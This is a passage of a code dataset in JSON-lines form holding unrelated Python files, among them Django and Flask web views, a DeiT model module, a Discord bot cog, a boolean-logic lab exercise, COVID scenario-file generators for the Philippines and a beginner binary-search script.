logger.debug(\"There are {} people in the store\".format(len(target_list.targets)))\n chosen = target_list.targets[0].target_id\n receipts[chosen].append(item_fin_name[0])\n \n #merged_detected_queue.task_done()\n moreData,next_time = get_sensor_batch(test_client, next_time, 0.5, Weight_sensor_number)\n printout_receipts(test_client, receipts,'BASELINE-1.json')\n\ndef printout_receipts(test_client, receipts, receiptFile):\n logger.warn(receipts)\n with open(receiptFile, 'w') as outFile:\n json.dump(receipts, outFile)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"cpsdriver/old_main.py","file_name":"old_main.py","file_ext":"py","file_size_in_byte":8066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"641556095","text":"import timm\n\nimport torch\nimport torch.nn as nn\n\n\nfrom dadeit.ingredient import Block\nfrom dadeit.utils import register_value\n\n\nclass DADeiT(nn.Module):\n def __init__(self, pretrained, patch_size=16, embed_dim=768, depth=12, num_heads=12):\n super().__init__()\n\n self.cls_token = pretrained.cls_token\n self.dist_token = pretrained.dist_token\n self.pos_embed = pretrained.pos_embed\n\n self.patch_embed = pretrained._modules[\"patch_embed\"]\n self.pos_drop = pretrained._modules[\"pos_drop\"]\n blocks = pretrained._modules[\"blocks\"]\n\n self.blocks = nn.Sequential(\n Block(blocks[0], 0),\n Block(blocks[1], 1),\n Block(blocks[2], 2),\n Block(blocks[3], 3),\n Block(blocks[4], 4),\n Block(blocks[5], 5),\n Block(blocks[6], 6),\n Block(blocks[7], 7),\n Block(blocks[8], 8),\n Block(blocks[9], 9),\n Block(blocks[10], 10),\n Block(blocks[11], 11),\n )\n\n self.norm = pretrained._modules[\"norm\"]\n self.pre_logits = pretrained._modules[\"pre_logits\"]\n self.head = pretrained._modules[\"head\"]\n\n self.head_dist = pretrained._modules[\"head_dist\"]\n\n def forward_debug(self, x, features_dict=None):\n x = self.patch_embed(x)\n\n register_value(\"patch_embed\", x.clone().detach(), features_dict)\n\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n\n register_value(\"concat+pos_embed\", x.clone().detach(), features_dict)\n\n if features_dict is not None:\n x, features_dict = self.blocks((x, features_dict))\n x = self.norm(x)\n else:\n x = self.blocks(x)\n x = self.norm(x)\n\n register_value(\"blocks\", x.clone().detach(), features_dict)\n\n x = x[:, 0], x[:, 1]\n\n register_value(\"cls_feature\", x[0].clone().detach(), features_dict)\n\n register_value(\"dist_feature\", x[1].clone().detach(), features_dict)\n\n x, x_dist = self.head(x[0]), self.head_dist(x[1]) # x must be a tuple\n\n if features_dict is not None:\n return (x + x_dist) / 2, features_dict\n else:\n return (x + x_dist) / 2\n\n\n def forward(self, x, features_dict=None):\n x = self.patch_embed(x)\n # if features_dict is not None:\n # features_dict[\"patch_embed\"].append(x.clone().detach())\n\n register_value(\"patches\", x.clone(), features_dict)\n\n cls_token = self.cls_token.expand(x.shape[0], -1, -1) # stole cls_tokens impl from Phil Wang, thanks\n x = torch.cat((cls_token, self.dist_token.expand(x.shape[0], -1, -1), x), dim=1)\n\n x = self.pos_drop(x + self.pos_embed)\n\n # if features_dict is not None:\n # features_dict[\"concat+pos_embed\"].append(x.clone().detach())\n\n if features_dict is not None:\n x, features_dict = self.blocks((x, features_dict))\n x = self.norm(x)\n else:\n x = self.blocks(x)\n x = self.norm(x)\n\n # if features_dict is not None:\n # features_dict[\"blocks\"].append(x.clone().detach())\n\n x = x[:, 0], x[:, 1]\n\n # if features_dict is not None:\n # features_dict[\"cls_feature\"].append(x[0].clone().detach())\n\n # if features_dict is not None:\n # features_dict[\"dist_feature\"].append(x[1].clone().detach())\n\n x, x_dist = self.head(x[0]), self.head_dist(x[1]) # x must be a tuple\n\n if features_dict is not None:\n return (x + x_dist) / 2, features_dict\n else:\n return (x + x_dist) / 2\n","sub_path":"dadeit/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"117935757","text":"from django.conf.urls import patterns, url\nfrom volunteer import views\n\nurlpatterns = patterns('',\n url(r'^create/$', views.create, name='create'),\n url(r'^delete/(?P\\d+)/$', views.delete, name='delete'),\n url(r'^delete_resume/(?P\\d+)/$', views.delete_resume, name='delete_resume'),\n url(r'^download_resume/(?P\\d+)/$', views.download_resume, name='download_resume'),\n url(r'^edit/(?P\\d+)/$', views.edit, name='edit'),\n url(r'^general_report/$', views.general_report, name='general_report'),\n url(r'^individual_report/(?P\\d+)$', views.individual_report, name='individual_report'),\n url(r'^list/$', views.list, name='list'),\n url(r'^options/$', views.options, name='options'),\n url(r'^profile/(?P\\d+)/$', views.profile , name='profile'),\n url(r'^search/$', views.search, name='search'),\n)\n","sub_path":"vms/volunteer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"339977375","text":"from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Topic\nfrom question.models import Question\nfrom django.db.models import Count\n\nMAX_TOPICS = 10\n\n\n@login_required\ndef FindTopic(request, topic_name):\n topics = Topic.objects.filter(name__icontains=topic_name)\n if not topics:\n return HttpResponse(\"No topic matching\")\n topic_response = ''\n for topic in topics:\n topic_response += '' + topic.name + '
'\n return HttpResponse(topic_response)\n\n\n@login_required\ndef ShowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n questions = topic.topic_questions.all().order_by('-time')\n topic_followers = topic.followers.all()\n\n following = False\n if request.user in topic_followers:\n following = True\n follow_count = len(topic_followers)\n\n return render(request, 'topic/topic.html', {'topic': topic,\n 'questions': questions,\n 'following': following,\n 'follow_count': follow_count})\n\n\n@login_required\ndef FollowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n topic.followers.add(request.user)\n return HttpResponse(topic.followers.count())\n\n\n@login_required\ndef UnfollowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n topic.followers.remove(request.user)\n return HttpResponse(topic.followers.count())\n\n\n@login_required\ndef ShowAllTopics(request):\n topics = Topic.objects.annotate(\n follower_count=Count('followers')).order_by('-follower_count')\n return render(request, 'topic/browse_topics.html', {'topics': topics})\n","sub_path":"topic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341329557","text":"from lib.vision_api_utils import VisionAPIUtils\nfrom lib.isolate_rects import IsolateRects\nfrom lib.img_anno_manage import ImgAnnoManage\nimport cv2\nimport os\nimport tkinter\nimport tkinter.filedialog\n\niam = ImgAnnoManage()\niso = IsolateRects(debug=False, init_show=False)\nvau = VisionAPIUtils(debug=False)\n\n\ndef proc(image_path):\n if os.path.splitext(image_path)[1].lower() not in [\".jpg\", \".png\"]:\n print(\"\\nno correct file type.\")\n\n else:\n print(\"\\nfile name: \", image_path)\n print(\"processing ...\")\n\n img = iam.load_image(image_path)\n if img is None:\n print(\"can not read image file{}\".format(image_path))\n return\n\n ###\n splits = iso.isolate(img=img)\n\n if splits is not None:\n for i in range(len(splits)):\n sp = splits[i]\n print(\"== {}\".format(i))\n\n ###\n value = vau.get_values(split=sp, sp_id=i)\n\n if 'current' in value.keys():\n print(\"current: value: {}, level: {}\".format(value['current']['value'], value['current']['level']))\n if 'potential' in value.keys():\n print(\"potential: value: {}, level: {}\".format(value['potential']['value'], value['potential']['level']))\n\n cv2.imshow(\"img\", img)\n cv2.waitKey(0)\n\n\ndef main():\n while True:\n tk = tkinter.Tk()\n tk.withdraw()\n select_file = (tkinter.filedialog.askopenfile(initialdir='.', title='select a image file'))\n if select_file is not None:\n image_path = select_file.name\n proc(image_path=image_path)\n tk.update()\n tk.destroy()\n\n\ndef test(folder):\n fns = [fn for fn in os.listdir(folder) if os.path.splitext(fn)[1].lower() in [\".jpg\", \".png\"]]\n fns.sort()\n\n find_flag = False\n for fn in fns:\n if fn == \"15194_101995033431_EPCGRAPH_01_0000.jpg\":\n find_flag = True\n\n if not find_flag:\n continue\n\n path = os.path.join\n proc(image_path=os.path.join(folder, fn))\n\n\nif __name__ == '__main__':\n main()\n # test(\"./data/images\")\n # proc(image_path=\"./data/images/99943.jpg\")\n","sub_path":"endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168838800","text":"from app import db\nfrom app.models import Post\nfrom app.posts.forms import PostForm\n\nfrom flask import (abort, Blueprint, flash, redirect, render_template,\n request, url_for)\n\nfrom flask_login import current_user, login_required\n\n# -----------------------------------------------------------------------------\n# Init posts\n\nposts = Blueprint('posts', __name__)\n\n# -----------------------------------------------------------------------------\n# Post : Delete\n\n@posts.route(\"/post//delete\", \n methods = ['POST'])\n\n@login_required\n\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n if post.author != current_user:\n abort(403)\n\n db.session.delete(post)\n db.session.commit()\n\n flash('Your post has been deleted !', \n 'success')\n\n return redirect(url_for('main.home'))\n\n# -----------------------------------------------------------------------------\n# Post : Edit\n\n@posts.route(\"/post//update\", \n methods = ['GET', 'POST'])\n\n@login_required\n\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n if post.author != current_user:\n abort(403)\n\n form = PostForm()\n\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n\n db.session.commit()\n\n flash('Your post has been updated!', \n 'success')\n\n return redirect(url_for('posts.post', post_id = post.id))\n\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n\n return render_template('new_post.html', \n title = 'Update Post',\n legend = 'Update Post',\n form = form )\n\n# -----------------------------------------------------------------------------\n# Post : Get ID\n\n@posts.route(\"/post/\")\n\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('post.html',\n title = post.title,\n post = post)\n\n# -----------------------------------------------------------------------------\n# Post : New\n\n@posts.route(\"/post/new\",\n methods = ['GET', 'POST'])\n\n@login_required\n\ndef new_post():\n form = PostForm()\n\n if form.validate_on_submit():\n post = Post(title = form.title.data,\n content = form.content.data,\n author = current_user)\n\n db.session.add(post)\n db.session.commit()\n\n flash('Your post has been created !',\n 'success')\n \n return redirect(url_for('main.home'))\n\n return render_template('new_post.html', \n title = 'New Post',\n legend = 'New Post',\n form = form)","sub_path":"Flask App/Blog/app/posts/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"196726886","text":"from discodb import DiscoDB\nfrom bitdeli.model import model\n\nMAX_LEN = 64\n\n@model\ndef build(profiles):\n keys = set()\n for profile in profiles:\n uid = profile.uid\n if not uid:\n continue\n fields = set()\n for tstamp, group, ip, event in profile['events']:\n e = 'e:%s' % event.pop('$event_name').encode('utf-8')\n keys.add(e)\n fields.add(e)\n for prop_name, prop_value in event.iteritems():\n p = prop_name.encode('utf-8')\n keys.add('p:%s' % p)\n fields.add('%s:%s' % (p, str(prop_value)[:MAX_LEN].encode('utf-8')))\n for field in fields:\n yield field, uid\n for key in keys:\n yield ' ', key\n","sub_path":"jsapi/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428057255","text":"import discord\nfrom discord.ext import commands\n\nimport random\n\n\nclass Random:\n \"\"\"Commands which are based on RNG's.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='choose', aliases=['select'])\n async def _choose(self, ctx, *args):\n \"\"\"Make Myst choose between two or more things.\"\"\"\n\n choice = random.choice(args)\n await ctx.send(f'**`{choice}`**')\n\n @commands.command(name='roll')\n async def roll_dice(self, ctx, first: int, second: int):\n \"\"\"Returns a number between two selected numbers.\"\"\"\n\n rolled = random.randint(first, second)\n await ctx.send(f'{ctx.author.mention} rolled: **`{rolled}`**')\n\n\ndef setup(bot):\n bot.add_cog(Random(bot))\n","sub_path":"cogs/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"95768796","text":"# -*- coding: utf-8 -*-\ndef custom_bin(num, sz = 5):\n return bin(num)[2:].rjust(sz, '0')\n\ndef dnf(bits):\n x1, x2, x3, x4, x5 = tuple(map(bool, map(int, custom_bin(bits))))\n z1 = not x1 and not x3\n z2 = x1 and x3\n z3 = x1 and not x2\n z4 = not x3 and x4\n z5 = x2 and x3\n z6 = not x4 and not x5\n u1 = z3 and z4\n u2 = z1 and not x4\n u3 = z1 and x2\n u4 = z2 and not x4\n u5 = z2 and x2\n u6 = z5 and z6\n u7 = z1 and not x5\n u8 = z2 and not x5\n v3 = u1 or u2\n v4 = u3 or u4\n v5 = u5 or u6\n v6 = u7 or u8\n v1 = v3 or v4\n v2 = v5 or v6\n f = v1 or v2\n return int(f)\n\ndef knf(bits):\n x1, x2, x3, x4, x5 = tuple(map(bool, map(int, custom_bin(bits))))\n z1 = x1 or not x3\n z3 = not x1 or x3\n z4 = not x4 or not x5\n z2 = x2 or z4\n u1 = x1 or z2\n u2 = not x3 or z2\n u3 = x4 or z3\n u4 = not x4 or z1\n u5 = not x2 or z3\n u6 = not x5 or z1\n u7 = x2 or z1\n v5 = u1 and u2\n v4 = u5 and u6\n v3 = u3 and v5\n v2 = u7 and v4\n v1 = u4 and v3\n f = v1 and v2\n return int(f)\n\nvar_count = 5\nbit_set = 0\ntable = {}\nprint(\"Таблица истинности исходной функции:\")\nfor _ in range(2**var_count):\n str_bs = custom_bin(bit_set) # Вектор переменных x1 - x5\n table[bit_set] = int(\n eval(\n '-2 <= ({0} - {1}) and ({0} - {1}) < 3'.format( # Условие -2 <=(x1x20-x3x4x5)<3\n int(str_bs[:2] + '0', 2), # Первое выражение x1x20\n int(str_bs[2:], 2) # Второе выражение x3x4x5\n )\n )\n )\n print(\n '| ' + ' | '.join(list(str_bs + str(table[bit_set]))) + ' |'\n )\n bit_set += 1\n\nprint(\"Таблица истинности схемы по ДНФ:\")\ntable_dnf = {}\nbit_set = 0\nfor _ in range(2**var_count):\n table_dnf[bit_set] = dnf(bit_set)\n print(\n '| ' + ' | '.join(list(custom_bin(bit_set) + str(table_dnf[bit_set]))) + ' |'\n )\n bit_set += 1\n \nprint(\"Таблица истинности схемы по КНФ:\")\ntable_knf = {}\nbit_set = 0\nfor _ in range(2**var_count):\n table_knf[bit_set] = knf(bit_set)\n print(\n '| ' + ' | '.join(list(custom_bin(bit_set) + str(table_knf[bit_set]))) + ' |'\n )\n bit_set += 1\n\nprint(\"Исходная и днф совпадают: \", table == table_dnf)\nprint(\"Исходная и кнф совпадают: \", table == table_knf)\n","sub_path":"TCA/lab1/report/source/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"569253924","text":"#python\n\n# resize_selected_locators.py\n#\n# Version 1.2 - By Cristobal Vila, 2013 - With the help of other members from Luxology Forums :-)\n# Special thanks to MonkeybrotherJR\n#\n# To give a custom size to all channels in a selected Locators,\n# no matter the kind of Locators and if there are some channels greyed\n#\n# www.etereaestudios.com\n\nimport lx\n\ntry:\n\n scene_svc = lx.Service(\"sceneservice\")\n\n # Define my argument:\n mysize = float(lx.args()[0])\n\n # get selected layers\n selected_layers = lx.evalN(\"query sceneservice selection ? all\")\n\n # drop selection so that we can work on one item at a time\n lx.eval(\"select.drop item\")\n\n # create empty list to put locators in\n locators = []\n\n for item in selected_layers:\n\n # select layer\n scene_svc.select(\"item\",str(item))\n lx.eval('select.item {%s} set' % item)\n\n # get item type\n itemType = scene_svc.query(\"item.type\")\n\n if itemType == 'locator':\n\n locators.append(item)\n\n # Ask if our locator has a default or custom shape:\n lx.eval('item.channel locator$drawShape ?')\n\n # This gives a result (default / custom)\n # Save that result into a variable:\n locatorShape = lx.eval1('item.channel locator$drawShape ?')\n\n if locatorShape == 'default':\n # Change size for standard default locator:\n lx.eval(\"item.channel locator$size \" +str(mysize))\n\n elif locatorShape == 'custom':\n # Ask which is actual shape:\n lx.eval(\"item.channel locator$isShape ?\")\n\n # This gives a result (box, pyramid, plane…)\n # Save that result into a variable:\n originalShape = lx.eval(\"item.channel locator$isShape ?\")\n\n # Change size for standard default locator:\n lx.eval(\"item.channel locator$size \" +str(mysize))\n\n # Set shape to Box:\n lx.eval(\"item.channel locator$isShape box\")\n\n # Change properties for XYZ channels, since now all are available:\n lx.eval(\"item.channel locator$isSize.X \" +str(mysize))\n lx.eval(\"item.channel locator$isSize.Y \" +str(mysize))\n lx.eval(\"item.channel locator$isSize.Z \" +str(mysize))\n\n # Set shape to Circle:\n lx.eval(\"item.channel locator$isShape circle\")\n\n # Change properties for Radius, since now this is available:\n lx.eval(\"item.channel locator$isRadius \" +str(mysize * 0.5))\n\n # Change shape back to the one saved inside our first variable:\n lx.eval(\"item.channel locator$isShape %s\" % originalShape)\n\n # re-select the user selected layers\n for item in selected_layers:\n lx.eval('select.item {%s} add' % item)\n\nexcept:\n lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))","sub_path":"eterea_quickLocators/scripts/resize_selected_locators.py","file_name":"resize_selected_locators.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"222686349","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^index$', views.index, name='index'),\n url(r'^anliall$', views.anliall, name='anliall'),\n url(r'^oushi$', views.oushi, name='oushi'),\n url(r'^katong$', views.katong, name='katong'),\n url(r'^zhongshi$', views.zhongshi, name='zhongshi'),\n url(r'^xiandai$', views.xiandai, name='xiandai'),\n url(r'^jianyue$', views.jianyue, name='jianyue'),\n url(r'^about$', views.about, name='about'),\n url(r'^about1$', views.about1, name='about1'),\n url(r'^about2$', views.about2, name='about2'),\n url(r'^about3$', views.about3, name='about3'),\n url(r'^about4$', views.about4, name='about4'),\n url(r'^news$', views.news, name='news'),\n url(r'^news1$', views.news1, name='news1'),\n url(r'^news2$', views.news2, name='news2'),\n url(r'^news3$', views.news3, name='news3'),\n url(r'^jiameng$', views.jiameng, name='jiameng'),\n url(r'^cont$', views.cont, name='cont'),\n url(r'^VR$', views.VR, name='VR'),\n url(r'^VRoushi$', views.VRoushi, name='VRoushi'),\n url(r'^VRbeiou$', views.VRbeiou, name='VRbeiou'),\n url(r'^VRzhongshi$', views.VRzhongshi, name='VRzhongshi'),\n url(r'^VRxiandai$', views.VRxiandai, name='VRxiandai'),\n url(r'^VRmeishi$', views.VRmeishi, name='VRmeishi'),\n url(r'^VRbieshu$', views.VRbieshu, name='VRbieshu'),\n url(r'^VRdizhonghai$', views.VRdizhonghai, name='VRdizhonghai'),\n]","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"62931670","text":"\"\"\"\nMerge List Of Number Into Ranges\n\nThis problem was recently asked by Facebook:\n\nGiven a sorted list of numbers, return a list of strings that represent all of the consecutive numbers.\n\nExample:\nInput: [0, 1, 2, 5, 7, 8, 9, 9, 10, 11, 15]\nOutput: ['0->2', '5->5', '7->11', '15->15']\nAssume that all numbers will be greater than or equal to 0, and each element can repeat.\n\n\n\"\"\"\n\ndef solution(numbers):\n if not numbers:\n return []\n \n ranges = []\n low, high = numbers[0], numbers[0]\n\n for number in numbers:\n if high + 1 < number:\n ranges.append(f\"{low} -> {high}\")\n low = number\n high = number\n ranges.append(f\"{low} -> {high}\")\n return ranges\n\n\nif __name__ == \"__main__\":\n print(solution([0, 1, 2, 5, 7, 8, 9, 9, 10, 11, 15]))","sub_path":"python/daily_interview_pro/202003/20200331.py","file_name":"20200331.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"284262940","text":"\"\"\"\nThe scenario parameter files of the \"philippines\" application \ncan be replicated for the regional philippines applications.\n\nTo do this, run this script.\n\"\"\"\nimport os\nfrom copy import copy\nfrom time import sleep\n\nimport yaml\n\nfrom autumn.settings import Region\n\nSCENARIO_START_TIME = 573 # 26 Jul 2021\n#\n# WORKFORCE_PROP = []\n# BACK_TO_NORMAL_FRACTIONS = []\n# MHS_REDUCTION_FRACTIONS = []\n# SCHOOL_REOPEN_FRACTIONS = []\n\nBASELINE_TARGET_VACC_COVERAGE = .3\nVACCINE_SCENARIOS = {\"extra_coverage_from_baseline_target\": [0., .4]}\nINCREASED_MOBILITY = [0., .3, .5]\nINCREASED_TESTING = [0., .5]\n\n\ndef clear_all_scenarios(region):\n dir_name = region.replace(\"-\", \"_\")\n file_path = f\"../{dir_name}/params/\"\n\n scenario_files = os.listdir(file_path)\n for filename in scenario_files:\n if filename.startswith(\"scenario-\"):\n os.remove(f\"../{dir_name}/params/{filename}\")\n\n\ndef get_greater_scenario_number(region):\n dir_name = region.replace(\"-\", \"_\")\n file_path = f\"../{dir_name}/params/\"\n\n scenario_files = os.listdir(file_path)\n sc_numbers = [\n float(filename.split(\"-\")[1].split(\".yml\")[0])\n for filename in scenario_files\n if filename.startswith(\"scenario-\")\n ]\n\n return int(max(sc_numbers))\n\n\ndef write_all_phl_scenarios(scenario_start_time=SCENARIO_START_TIME):\n clear_all_scenarios(\"philippines\")\n sleep(1.0)\n\n sc_index = 0\n all_scenarios_dict = {}\n\n # # Back to normal in workplaces and other locations\n # for fraction in BACK_TO_NORMAL_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_back_to_normal_sc_dict(fraction, scenario_start_time)\n #\n # # MHS reduction\n # for fraction in MHS_REDUCTION_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_mhs_reduction_sc_dict(fraction, scenario_start_time)\n #\n # # School reopening\n # for fraction in SCHOOL_REOPEN_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_school_reopen_sc_dict(fraction, scenario_start_time)\n\n # Vaccination combined with mobility changes\n for extra_coverage in VACCINE_SCENARIOS[\"extra_coverage_from_baseline_target\"]:\n for increased_mobility in INCREASED_MOBILITY:\n for increased_testing in INCREASED_TESTING:\n if extra_coverage == 0. and increased_mobility == 0. and increased_testing == 0.:\n continue # this is the baseline scenario\n sc_index += 1\n all_scenarios_dict[sc_index] = make_vaccination_and_increased_mobility_and_increased_testing_sc_dict(\n extra_coverage, increased_mobility, increased_testing, scenario_start_time\n )\n\n # dump scenario files\n for sc_i, scenario_dict in all_scenarios_dict.items():\n print(f\"Scenario {sc_i}: {scenario_dict['description']}\")\n\n file_path = f\"params/scenario-{sc_i}.yml\"\n with open(file_path, \"w\") as f:\n yaml.dump(scenario_dict, f)\n\n\ndef initialise_sc_dict(scenario_start_time):\n return {\n \"time\": {\"start\": scenario_start_time},\n }\n\n\ndef make_back_to_normal_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"{perc}% return to normal (work and other locations)\"\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time],\n \"values\": [[\"close_gap_to_1\", fraction]],\n },\n \"other_locations\": {\n \"append\": True,\n \"times\": [scenario_start_time],\n \"values\": [[\"close_gap_to_1\", fraction]],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_mhs_reduction_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"Reduction in MHS by {perc}%\"\n\n sc_dict[\"mobility\"] = {\n \"microdistancing\": {\n \"behaviour\": {\n \"parameters\": {\n \"times\": [scenario_start_time - 1, scenario_start_time],\n \"values\": [1.0, 1.0 - fraction],\n }\n }\n }\n }\n\n return sc_dict\n\n\ndef make_school_reopen_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"{perc}% of schools reopen\"\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"school\": {\n \"append\": False,\n \"times\": [scenario_start_time - 1, scenario_start_time],\n \"values\": [0.0, fraction],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_vaccination_and_workforce_sc_dict(coverage, prop_workforce, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc_coverage = int(100 * coverage)\n perc_workforce = int(100 * prop_workforce)\n\n sc_dict[\n \"description\"\n ] = f\"{perc_coverage}% vaccine coverage / {perc_workforce}% onsite workers\"\n\n sc_dict[\"vaccination\"] = {\n \"roll_out_components\": [\n {\n \"supply_period_coverage\": {\n \"coverage\": coverage,\n \"start_time\": scenario_start_time,\n \"end_time\": 731, # end of year 2021\n }\n }\n ],\n }\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], prop_workforce],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_vaccination_and_increased_mobility_and_increased_testing_sc_dict(\n extra_coverage, increased_mobility, increased_testing, scenario_start_time\n):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc_coverage = int(100 * (extra_coverage + BASELINE_TARGET_VACC_COVERAGE))\n perc_increase_mobility = int(100 * increased_mobility)\n perc_increase_testing = int(100 * increased_testing)\n\n mobility_description = f\"{perc_increase_mobility}% increased mobility\" if perc_increase_mobility > 0. else \"baseline mobility\"\n testing_description = f\"{perc_increase_testing}% increased testing\" if perc_increase_testing > 0. else \"baseline testing\"\n\n sc_dict[\n \"description\"\n ] = f\"{perc_coverage}% vaccine coverage / {mobility_description} / {testing_description}\"\n\n if extra_coverage > 0.:\n sc_dict[\"vaccination\"] = {\n \"roll_out_components\": [\n {\n \"supply_period_coverage\": {\n \"coverage\": extra_coverage + BASELINE_TARGET_VACC_COVERAGE,\n \"start_time\": scenario_start_time,\n \"end_time\": 731, # end of year 2021\n }\n }\n ],\n }\n if increased_mobility > 0.:\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], [\"scale_prev\", 1. + increased_mobility]],\n },\n \"other_locations\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], [\"scale_prev\", 1. + increased_mobility]],\n },\n }\n }\n\n if increased_testing > 0.:\n sc_dict['testing_to_detection'] = {\n 'test_multiplier': {\n 'times': [scenario_start_time - 1, scenario_start_time + 1],\n 'values': [1., 1. + increased_testing]\n }\n }\n\n return sc_dict\n\n\ndef read_all_phl_scenarios():\n \"\"\"\n Read all the scenarios defined for the \"philippines\" application\n :return: a dictionary containing all the scenario parameters\n \"\"\"\n scenario_param_dicts = {}\n\n param_files = os.listdir(\"params/\")\n for filename in param_files:\n if filename.startswith(\"scenario-\"):\n file_path = f\"params/{filename}\"\n with open(file_path) as file:\n sc_dict = yaml.load(file)\n\n scenario_param_dicts[filename] = sc_dict\n\n return scenario_param_dicts\n\n\ndef copy_scenarios_to_phl_regions():\n \"\"\"\n Replicate all scenarios defined for the \"philippines\" application to the three regional applications\n :return:\n \"\"\"\n scenario_param_dicts = read_all_phl_scenarios()\n\n for region in Region.PHILIPPINES_REGIONS:\n if region == \"philippines\":\n continue\n dir_name = region.replace(\"-\", \"_\")\n\n clear_all_scenarios(region)\n sleep(1.0)\n\n for filename, sc_dict in scenario_param_dicts.items():\n region_scenario_param = copy(sc_dict)\n file_path = f\"../{dir_name}/params/{filename}\"\n with open(file_path, \"w\") as f:\n yaml.dump(region_scenario_param, f)\n\n\nif __name__ == \"__main__\":\n\n # Update scenarios for the Philippines app\n write_all_phl_scenarios()\n\n # Copy scenarios from philippines to sub-regions\n copy_scenarios_to_phl_regions()\n","sub_path":"autumn/projects/covid_19/philippines/philippines/phl_utils.py","file_name":"phl_utils.py","file_ext":"py","file_size_in_byte":9367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"252845061","text":"# Binary Search with user function and Dynamic input\n\n#Defining the function binary_Search\ndef binary_Search(a,s):\n high = len(a)\n low = 0\n mid = (low+high)//2\n a.sort()\n if s not in a:\n print('Element not found in the array!!')\n elif a[mid] == s:\n print(f'Element found at index {mid}')\n elif s < a[mid]:\n for i in range(low,mid):\n if a[i] == s:\n print(f'Element found at index {i}')\n break\n else:\n for i in range (mid, high):\n if a[i] == s:\n print(f'Element found at index {i}')\n break\n\n\n\n#Taking the input from the user :\n\nn = int(input('Enter the size of the array : '))\narr = []\nprint(\"Enter the elements of the array\")\nfor i in range(n):\n x = int(input())\n arr.append(x)\n\n#Asking the user for the element to search\nse = int(input('Enter the element you want to search'))\n\n#calling the function\nbinary_Search(arr,se)\n","sub_path":"Binary Search with User defined function and Dynamic input.py","file_name":"Binary Search with User defined function and Dynamic 